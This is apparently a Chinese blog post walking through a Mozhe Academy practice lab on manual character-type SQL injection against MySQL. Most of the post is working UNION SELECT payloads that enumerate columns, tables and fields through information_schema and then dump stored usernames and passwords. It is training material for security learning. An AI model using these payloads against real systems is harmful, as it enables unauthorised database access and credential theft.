美文网首页
墨者学院-SQL手工注入漏洞测试(MySQL数据库-字符型)

墨者学院-SQL手工注入漏洞测试(MySQL数据库-字符型)

作者: nohands_noob | 来源:发表于2019-07-18 14:26 被阅读0次

    靶场地址:
    https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe

    既然靶场已经提示是字符型注入,那就不测试是什么型注入了

    查询列表有几列,并且第几列是回显在页面的
    id=tingjigonggao' and 1=2 union select 1,2,3,4%23,有4列,2,3列回显在页面

    查看数据库名及表名
    id=tingjigonggao' and 1=2 union select 1,database(),group_concat(table_name),4 from information_schema.tables where table_schema=database()%23

    查看stormgroup_member表字段名
    id=tingjigonggao' and 1=2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='stormgroup_member

    查找status为1的用户名和密码
    id=tingjigonggao' and 1=2 union select * from stormgroup_member where status=1%23

    相关文章

      网友评论

          本文标题:墨者学院-SQL手工注入漏洞测试(MySQL数据库-字符型)

          本文链接:https://www.haomeiwen.com/subject/gblllctx.html